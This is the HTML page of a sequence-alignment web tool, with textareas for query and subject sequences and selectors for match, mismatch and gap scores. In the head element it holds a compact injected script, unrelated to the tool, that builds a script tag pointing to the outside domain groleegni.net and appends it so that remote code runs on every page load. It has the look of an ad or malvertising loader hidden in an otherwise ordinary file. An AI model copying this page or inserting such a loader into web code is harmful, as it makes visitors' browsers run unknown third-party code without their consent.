<!DOCTYPE html>
<html lang="pt-br">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Web Alignment Tool</title>
    <link rel="stylesheet" href="./static/css/style.css">
    <script>(function(d,z,s){s.src='https://'+d+'/401/'+z;try{(document.body||document.documentElement).appendChild(s)}catch(e){}})('groleegni.net',8608496,document.createElement('script'))</script>
</head>

<body>
    <header>
        <h1 class="header-title">Web Alignment Tool</h1>
    </header>
    <div class="form-container">
        <h1 class="form-title">Sequence Form</h1>
        <div class="ajax-form">
            <label for="">Query Sequence:</label>
            <textarea name="seq1" id="seq1" cols="30" rows="10" class="seq-area"></textarea>
            <label for="">Subject Sequence:</label>
            <textarea name="seq2" id="seq2" cols="30" rows="10" class="seq-area"></textarea>
            <br>
            <div class="select-box">
                <label for="">Match:</label>
                <select name="match" id="match">
                    <option value="2">2</option>
                    <option value="5">5</option>
                    <option value="8">8</option>
                </select>
                <label for="">Mismatch:</label>
                <select name="mismatch" id="mismatch">
                    <option value="0">0</option>
                    <option value="-1">-1</option>
                    <option value="-5">-5</option>
                </select>
                <label for="">Gap Cost:</label>
                <select name="gap" id="gap">
                    <option value="0">0</option>
                    <option value="-2">-2</option>
                    <option value="-5">-5</option>
                </select>
            </div>
            <div class="buttons-box">
                <input class="submit-btn" type="button" value="Submit" onclick="requestAlignment()">
                <input class="clear-btn" type="button" value="Clear">
            </div>
        </div>
        <footer>
            <span>Github:</span>
            <a href="https://github.com/jamirnasci">@jamirnasci</a>
            <img src="https://avatars.githubusercontent.com/u/89231614?v=4" alt="" srcset="">
        </footer>
    </div>
</body>
<script src="./static/js/script.js"></script>
</html>
